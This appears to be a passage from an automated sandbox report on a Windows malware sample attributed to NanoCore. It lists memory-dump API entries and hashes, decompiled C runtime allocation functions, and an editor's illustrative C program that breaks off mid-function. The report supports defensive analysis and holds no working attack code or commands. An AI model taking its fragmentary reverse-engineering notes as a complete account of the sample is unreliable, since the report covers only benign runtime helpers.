            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: e3af79666ba6f42b11dc9d3cbda948d841a24c0029ebf62fb084e320b31798e8
            • Instruction ID: 128c7f65af82056a028799f3b6e1a34458b392e41da0b46a9b7e1608388b66c7
            • Opcode Fuzzy Hash: e3af79666ba6f42b11dc9d3cbda948d841a24c0029ebf62fb084e320b31798e8
            • Instruction Fuzzy Hash: F91149B1804249DFDB10CFA9D844BDEBFF8EF48310F14841AE964A7210C375A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,021253E8,00000000,?), ref: 0508E73D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 5b68427ec37f080e4723da06e51038dd5eae47f43121850e3f47e8fe003b9bbc
            • Instruction ID: 484d7cf5f8cb8cfc885ede183b23dce1029f7a969c1a98856d3eb3bd368f8398
            • Opcode Fuzzy Hash: 5b68427ec37f080e4723da06e51038dd5eae47f43121850e3f47e8fe003b9bbc
            • Instruction Fuzzy Hash: ED1125B58043499FDB10DF99D885BEEFBF8FB48324F10842AE954A3240D378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,021253E8,00000000,?), ref: 0508E73D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d673a1e6fee57aa4f1de73ce4c1142173e40bd102f2b17c7a254dec063d87631
            • Instruction ID: 49b95961428ec0494843f0e68576d77097a54b00511a5a5e5a7620efb182d7f3
            • Opcode Fuzzy Hash: d673a1e6fee57aa4f1de73ce4c1142173e40bd102f2b17c7a254dec063d87631
            • Instruction Fuzzy Hash: FD1113B58002099FDB10CF99D885BEEBBF8FB48324F10842AE954A7240D379A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0215FE9D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 4d74b51ea0e08b147431692e8fd8f924252e1d0f85e8d01dabeba5d83774a685
            • Instruction ID: 83066601a8358e77f92122a109c3b1135b7d9285e549e440df8381c954985b87
            • Opcode Fuzzy Hash: 4d74b51ea0e08b147431692e8fd8f924252e1d0f85e8d01dabeba5d83774a685
            • Instruction Fuzzy Hash: 2E1136B5900208DFDB10CF99D585BDEFBF4EB48314F20855AD869A7741C374A941CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0508BCBD
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 853f0cae1ccf9b0519362dae06b47deb47b9892eaecf22d79ed8b03125aad755
            • Instruction ID: fee76f4439cccd2092e8e2a853a6eac626555898e450c7188469c497c36202e6
            • Opcode Fuzzy Hash: 853f0cae1ccf9b0519362dae06b47deb47b9892eaecf22d79ed8b03125aad755
            • Instruction Fuzzy Hash: F311F2B5904348DFDB10DF99D489BEEBBF8FB48324F10842AE955A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0508226A,?,00000000,?), ref: 0508C435
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: ec7e0dcc18612030b047e51dffe57e51f046b39c409ed8198ba6217bd70b0b5b
            • Instruction ID: 25e0d86dfd3ce241b3f54af17085aff5b5f6e3737db0a8b9762df970cf6f2d5a
            • Opcode Fuzzy Hash: ec7e0dcc18612030b047e51dffe57e51f046b39c409ed8198ba6217bd70b0b5b
            • Instruction Fuzzy Hash: 6211F5B58043489FDB10DF99D444BEEBBF8FB58314F10841AE955A7700C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 0508D29D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: b7de2446ca1f4e564c80ca1c1496c613c0761c5c4ab8b286c58c6bdf792f6fc5
            • Instruction ID: 1a0ef9d3ed13ec30f709eeb22e17f8bc9a80a9060180e387cb06259c5d9423ee
            • Opcode Fuzzy Hash: b7de2446ca1f4e564c80ca1c1496c613c0761c5c4ab8b286c58c6bdf792f6fc5
            • Instruction Fuzzy Hash: 5511F2B5804348DFDB10DF9AD488BEEBBF8EB58324F10851AE959A7240C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,00000018,00000001,?), ref: 0508D29D
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 01bf07745c210987dd89a8cdf0382ede4ec13f89d87c1fb3867df30acc89f9d2
            • Instruction ID: 4cc21883bb7dd86f7fa0ca25f75aeb733cc0d7e3783fe32c86f5a3b61cbff8f5
            • Opcode Fuzzy Hash: 01bf07745c210987dd89a8cdf0382ede4ec13f89d87c1fb3867df30acc89f9d2
            • Instruction Fuzzy Hash: 4E11F2B58003489FDB10DF99D885BEEBFF8FB58320F10851AE854A7640C375AA54CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0215962E
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: ac8c9b215e9fa8214b0eb67803ba4542db9c55b17cfa2bdc96ede33386a62d2b
            • Instruction ID: 9b26aa2b466941aa7dca5750ca9a25564471f698b9b26eda8db24dbadc1892c0
            • Opcode Fuzzy Hash: ac8c9b215e9fa8214b0eb67803ba4542db9c55b17cfa2bdc96ede33386a62d2b
            • Instruction Fuzzy Hash: 2311E0B5D00259CFDB10CF9AD444BDEFBF4AB88214F14856AD829A7600D375A549CFA2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05256320
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 89946784d7450df5fffc2f8b7a78bc2a3763cc857690245a35fe28a7c694f94f
            • Instruction ID: eb0465c9ce51e0893ef9650b5242e3a66b3d8fcb80ef5f6f5a9c3785b6d5369d
            • Opcode Fuzzy Hash: 89946784d7450df5fffc2f8b7a78bc2a3763cc857690245a35fe28a7c694f94f
            • Instruction Fuzzy Hash: 771133B18042498FDB20CF99D444BDEBBF4EF88320F14842AD958A7240C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0508226A,?,00000000,?), ref: 0508C435
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 683cca019d0c8ddd151235b824207098554a708471d7e97009367af530ad1b9b
            • Instruction ID: fe749b0d9bebf17f8654192b178bfdc2d09c8100672c214c57ee03a781df9504
            • Opcode Fuzzy Hash: 683cca019d0c8ddd151235b824207098554a708471d7e97009367af530ad1b9b
            • Instruction Fuzzy Hash: 3811F2B58002489FDB10CF99D889BEEBBF8FB48324F10881AE854A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 0508BCBD
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: c3c70f919d5f1d8660aba2a9fad1c1d2b797f35beecc96a7bd18cd8ebf2f380d
            • Instruction ID: 9ed5b2b4858eecaefee7d977efcc1badc89b6688ceff1b16c1ccc6bf05fd4157
            • Opcode Fuzzy Hash: c3c70f919d5f1d8660aba2a9fad1c1d2b797f35beecc96a7bd18cd8ebf2f380d
            • Instruction Fuzzy Hash: 7B11D0B58042499FDB20DF99D489BDEFBF8FB88324F14841AE959A7700C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 4206869223d8645bf7b66e265e1e3a8b96d417dd083e1fefa3bc9c3c25605f5d
            • Instruction ID: bc3bed5f7ce379d377f72a87a962f862b62a77ec23075f9bb8c8d491749f8416
            • Opcode Fuzzy Hash: 4206869223d8645bf7b66e265e1e3a8b96d417dd083e1fefa3bc9c3c25605f5d
            • Instruction Fuzzy Hash: E51125B1C047498FDB10CF9AD848BDEFBF4EB48314F10852AD819A3600C378A540CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 0215FE9D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: f7f9a818f7c0c3a16d55751dda50c2877c5f7d9520daaa43d3f6540cfe608e94
            • Instruction ID: d1c11fa05a0f4e81ab446ed3f5177af8b1b057746b3e3f1fa9bea4828abc8e1b
            • Opcode Fuzzy Hash: f7f9a818f7c0c3a16d55751dda50c2877c5f7d9520daaa43d3f6540cfe608e94
            • Instruction Fuzzy Hash: 661103B5900248DFDB10CF99D585BDEFBF8EB48324F20855AE818A7640C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: c01741ba34ec8da96b7a0d2a381f173ab2a78f8e250ecce2c11768e87a82404c
            • Instruction ID: f9de1e8e65fdccd087ebb4d231da0a23eb6a08b61a6d77b2151929baee3a81eb
            • Opcode Fuzzy Hash: c01741ba34ec8da96b7a0d2a381f173ab2a78f8e250ecce2c11768e87a82404c
            • Instruction Fuzzy Hash: EB11D0B5D046498FDB20CF9AD848BDEFBF4FB48324F10852AE819A7240D378A544CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E00403E3D(void* __ecx, long _a4) {
            				void* _t4;
            				void* _t6;
            				void* _t7;
            				long _t8;
            
            				_t7 = __ecx;
            				_t8 = _a4; // requested allocation size in bytes
            				if(_t8 > 0xffffffe0) {
            					// Request exceeds the maximum heap request size: fail with errno = ENOMEM (0xc = 12).
            					L7:
            					 *((intOrPtr*)(E00404831())) = 0xc; // E00404831 returns the address of errno
            					__eflags = 0;
            					return 0;
            				}
            				if(_t8 == 0) {
            					_t8 = _t8 + 1; // a zero-byte request still allocates one byte, as CRT malloc does
            				}
            				while(1) {
            					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed: *0x4132b0 holds the CRT heap handle
            					if(_t4 != 0) {
            						break; // allocation succeeded
            					}
            					// Allocation failed: if no new-handler is installed, give up with ENOMEM.
            					__eflags = E00403829();
            					if(__eflags == 0) {
            						goto L7;
            					}
            					// Invoke the new-handler; if it reports no memory could be released, give up, otherwise retry.
            					_t6 = E004068FD(_t7, __eflags, _t8);
            					_pop(_t7);
            					__eflags = _t6;
            					if(_t6 == 0) {
            						goto L7;
            					}
            				}
            				return _t4; // pointer to the heap block
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 16e28aa4d9dd8db784a71409ab7287830929c1941d2818788106ccaba7ebdfe5
            • Instruction ID: 5383cb79cd8c1974534ede7c2307d295362694da7846ae2c5047195f56286932
            • Opcode Fuzzy Hash: 16e28aa4d9dd8db784a71409ab7287830929c1941d2818788106ccaba7ebdfe5
            • Instruction Fuzzy Hash: 152100B1608240DFDF00DF50D8C0F26BFA5FB98324F248569EA094B206C336D896CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 622c382539802749687551b829eb44d705b5aab5d9249f2014dd4586035a5851
            • Instruction ID: e54c602ddddb8bec9ca326b7cfc3ff45f226386a20db8993e9f9344098d09282
            • Opcode Fuzzy Hash: 622c382539802749687551b829eb44d705b5aab5d9249f2014dd4586035a5851
            • Instruction Fuzzy Hash: C021F2B0608240DFDB14CF20D8C0B26BBA5FB89314F24C969D98B4B686C33AD807CA61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a29e665a889feca7d14087a73ea541ea31fe8984062f08220b93ec8c9ff693fe
            • Instruction ID: 4fd7e4588317b398e735e4b4e439399403fd695d0e0054e579421127606e5a0a
            • Opcode Fuzzy Hash: a29e665a889feca7d14087a73ea541ea31fe8984062f08220b93ec8c9ff693fe
            • Instruction Fuzzy Hash: 1D2107B0604240EFDB01CF50D5C0F66BBA5FB85314F24CA6DD98A4B696C336D80ACB61
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 597bd0a1cb3c8787075cd1b7d0fc5fbf6525ec6edaa5e8d5cd9b42079994ede6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: F7119376504280DFCF15CF10D5C4B16BFB1FB94324F24C6A9D9494B656C336D896CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 417162c00a896d0d82f0e95d502c07a8f4b975dc75b016a89a7f01e1e0f84acd
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: E0119D75904280DFCB11CF10D5C4B55FBB1FB85324F24C6AED88A4B696C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684191976.0000000000AAD000.00000040.00000001.sdmp, Offset: 00AAD000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 621f1f965b426ed7713b7a2d307738711cdb263ee03d18cfb52ac0242dc5d75f
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 11119075504280DFCB11CF14D5C4B15FB71FB45314F24C6AED84A4B696C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ae758954450c6ba54caf70d1419017dd78288ebe8008ff63443bdb988b4b1cbf
            • Instruction ID: f9131fb608013a3b1a5300790ea567ee1f90ac9dd4cc200182291e6e72448320
            • Opcode Fuzzy Hash: ae758954450c6ba54caf70d1419017dd78288ebe8008ff63443bdb988b4b1cbf
            • Instruction Fuzzy Hash: 5A01A77160C3449AEF104B25CC84BA6FBD8EF51364F18C55AED4A5B246C3799885C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.684155575.0000000000A9D000.00000040.00000001.sdmp, Offset: 00A9D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a08329857342744dd3bb11c8e75215d5d1ee61c843be6f2a2cfa8105a5b9c643
            • Instruction ID: b5a3e22cd85840dafe15c1bbd76a6cff9eac4357f3cf38be566d1dad7cb2b2c4
            • Opcode Fuzzy Hash: a08329857342744dd3bb11c8e75215d5d1ee61c843be6f2a2cfa8105a5b9c643
            • Instruction Fuzzy Hash: FE01716150D3C05FE7128B258C94B52BFB8EF53224F1980DBD9889F297C2699848C772
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t56;
            				signed int _t58;
            				short* _t60;
            				signed int _t64;
            				short* _t68;
            				int _t76;
            				short* _t79;
            				signed int _t85;
            				signed int _t88;
            				void* _t93;
            				void* _t94;
            				int _t96;
            				short* _t99;
            				int _t101;
            				int _t103;
            				signed int _t104;
            				short* _t105;
            				void* _t108;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x412014; // 0x9573097c
            				_v8 = _t49 ^ _t104;
            				_t101 = _a20;
            				if(_t101 > 0) {
            					_t76 = E004080D8(_a16, _t101);
            					_t108 = _t76 - _t101;
            					_t4 = _t76 + 1; // 0x1
            					_t101 = _t4;
            					if(_t108 >= 0) {
            						_t101 = _t76;
            					}
            				}
            				_t96 = _a32;
            				if(_t96 == 0) {
            					_t96 =  *( *_a4 + 8);
            					_a32 = _t96;
            				}
            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					E004018CC();
            					return _t54;
            				} else {
            					_t93 = _t54 + _t54;
            					_t83 = _t93 + 8;
            					asm("sbb eax, eax");
            					if((_t93 + 0x00000008 & _t54) == 0) {
            						_t79 = 0;
            						__eflags = 0;
            						L14:
            						if(_t79 == 0) {
            							L36:
            							_t103 = 0;
            							L37:
            							E004063D5(_t79);
            							_t54 = _t103;
            							goto L38;
            						}
            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
            						_t119 = _t56;
            						if(_t56 == 0) {
            							goto L36;
            						}
            						_t98 = _v12;
            						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
            						_t103 = _t58;
            						if(_t103 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t94 = _t103 + _t103;
            							_t85 = _t94 + 8;
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							__eflags = _t85 & _t58;
            							if((_t85 & _t58) == 0) {
            								_t99 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t99;
            								if(__eflags == 0) {
            									L35:
            									E004063D5(_t99);
            									goto L36;
            								}
            								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
            								__eflags = _t60;
            								if(_t60 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
            								__eflags = _t103;
            								if(_t103 != 0) {
            									E004063D5(_t99);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t88 = _t94 + 8;
            							__eflags = _t94 - _t88;
            							asm("sbb eax, eax");
            							_t64 = _t58 & _t88;
            							_t85 = _t94 + 8;
            							__eflags = _t64 - 0x400;
            							if(_t64 > 0x400) {
            								__eflags = _t94 - _t85;
            								asm("sbb eax, eax");
            								_t99 = E00403E3D(_t85, _t64 & _t85);
            								_pop(_t85);
            								__eflags = _t99;
            								if(_t99 == 0) {
            									goto L35;
            								}
            								 *_t99 = 0xdddd;
            								L28:
            								_t99 =  &(_t99[4]);
            								goto L30;
            							}
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							E004018E0();
            							_t99 = _t105;
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L35;
            							}
            							 *_t99 = 0xcccc;
            							goto L28;
            						}
            						_t68 = _a28;
            						if(_t68 == 0) {
            							goto L37;
            						}
            						_t123 = _t103 - _t68;
            						if(_t103 > _t68) {
            							goto L36;
            						}
            						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
            						if(_t103 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t70 = _t54 & _t93 + 0x00000008;
            					_t83 = _t93 + 8;
            					if((_t54 & _t93 + 0x00000008) > 0x400) {
            						__eflags = _t93 - _t83;
            						asm("sbb eax, eax");
            						_t79 = E00403E3D(_t83, _t70 & _t83);
            						_pop(_t83);
            						__eflags = _t79;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t79 = 0xdddd;
            						L12:
            						_t79 =  &(_t79[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E004018E0();
            					_t79 = _t105;
            					if(_t79 == 0) {
            						goto L36;
            					}
            					 *_t79 = 0xcccc;
            					goto L12;
            				}
            			}

            Instruction addresses (per-line address column of the decompiler view): 0x004078d4 to 0x00407ae4

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%
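The allocation scaffolding in E004078CF above (and again in E004062B8 further down) is the MSVC CRT _malloca/_freea idiom rather than anything specific to this sample: the function doubles the wide-character count returned by MultiByteToWideChar, adds 8 bytes with a carry check (the `sbb eax, eax` mask zeroes the size if the addition wrapped), takes the block from the stack via __alloca_probe_16 when the total is at most 0x400 bytes and from the heap via E00403E3D (RtlAllocateHeap) otherwise, writes 0xcccc or 0xdddd as a 2-byte marker, advances the pointer by 8 (`&(_t79[4])` on a `short*`), and later hands the pointer to __freea, which reads the marker back to decide whether a heap free is needed. Recognising the pattern saves triage time: these "Non-executed Functions" are statically linked runtime helpers for string conversion and console output, not NanoCore logic. The C program below is an illustration added by the editor, not code from the sample or from the report; the `crt_malloca_*` and `crt_freea` names are the editor's own, and only the constants (0x400 threshold, 8-byte header, 0xCCCC, 0xDDDD) are taken from the decompiled output above.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants as they appear in the decompiled functions above (and in the
 * MSVC CRT's _malloca on x86): 0x400-byte threshold, 8-byte marker header,
 * 0xCCCC tags a stack block, 0xDDDD tags a heap block. */
#define MALLOCA_THRESHOLD    0x400u
#define MALLOCA_MARKER_SIZE  8u
#define MALLOCA_STACK_MARKER 0xCCCCu
#define MALLOCA_HEAP_MARKER  0xDDDDu

/* Size request for n UTF-16 code units plus the marker header. Mirrors
 * "_t93 = n + n; cmp _t93+8, _t93; sbb eax, eax; and eax, size": when the
 * +8 carries, the mask becomes 0 and the whole size collapses to 0, which
 * the caller treats as an allocation failure. */
static uint32_t crt_malloca_size_for_wchars(uint32_t n)
{
    uint32_t bytes = n * 2u;
    uint32_t total = bytes + MALLOCA_MARKER_SIZE;
    return (total < bytes) ? 0u : total;
}

/* Path selection: strictly more than 0x400 bytes goes to the heap,
 * anything else comes from the stack (the "if(x > 0x400)" test above). */
static int crt_malloca_uses_heap(uint32_t total)
{
    return total > MALLOCA_THRESHOLD;
}

/* Write the marker and return the user pointer 8 bytes past it; this is
 * the "*_t79 = 0xdddd; _t79 = &(_t79[4]);" pair (4 shorts == 8 bytes). */
static void *crt_malloca_mark(void *raw, uint16_t marker)
{
    if (raw == NULL)
        return NULL;
    memcpy(raw, &marker, sizeof marker);
    return (char *)raw + MALLOCA_MARKER_SIZE;
}

/* Heap branch end to end: a marked buffer for n wide characters, or NULL
 * when the size overflowed or the request is small enough for the stack
 * (the stack branch needs alloca in the caller's frame; see main). */
static uint16_t *crt_malloca_heap_wchars(uint32_t n)
{
    uint32_t total = crt_malloca_size_for_wchars(n);
    if (total == 0u || !crt_malloca_uses_heap(total))
        return NULL;
    return (uint16_t *)crt_malloca_mark(malloc(total), MALLOCA_HEAP_MARKER);
}

/* Reads the marker back without freeing, so a caller can classify a block. */
static uint16_t crt_malloca_marker_of(const void *p)
{
    uint16_t marker;
    memcpy(&marker, (const char *)p - MALLOCA_MARKER_SIZE, sizeof marker);
    return marker;
}

/* __freea: look 8 bytes before the pointer and free only heap blocks.
 * Returns 1 when free() was called, 0 for NULL or a 0xCCCC stack block
 * (stack memory is released when the owning function returns). */
static int crt_freea(void *p)
{
    if (p == NULL)
        return 0;
    if (crt_malloca_marker_of(p) == MALLOCA_HEAP_MARKER) {
        free((char *)p - MALLOCA_MARKER_SIZE);
        return 1;
    }
    return 0;
}

int main(void)
{
    /* Small request: the stack branch, marked in this frame like _alloca. */
    uint16_t stack_raw[MALLOCA_THRESHOLD / 2];
    uint16_t *small = crt_malloca_mark(stack_raw, MALLOCA_STACK_MARKER);
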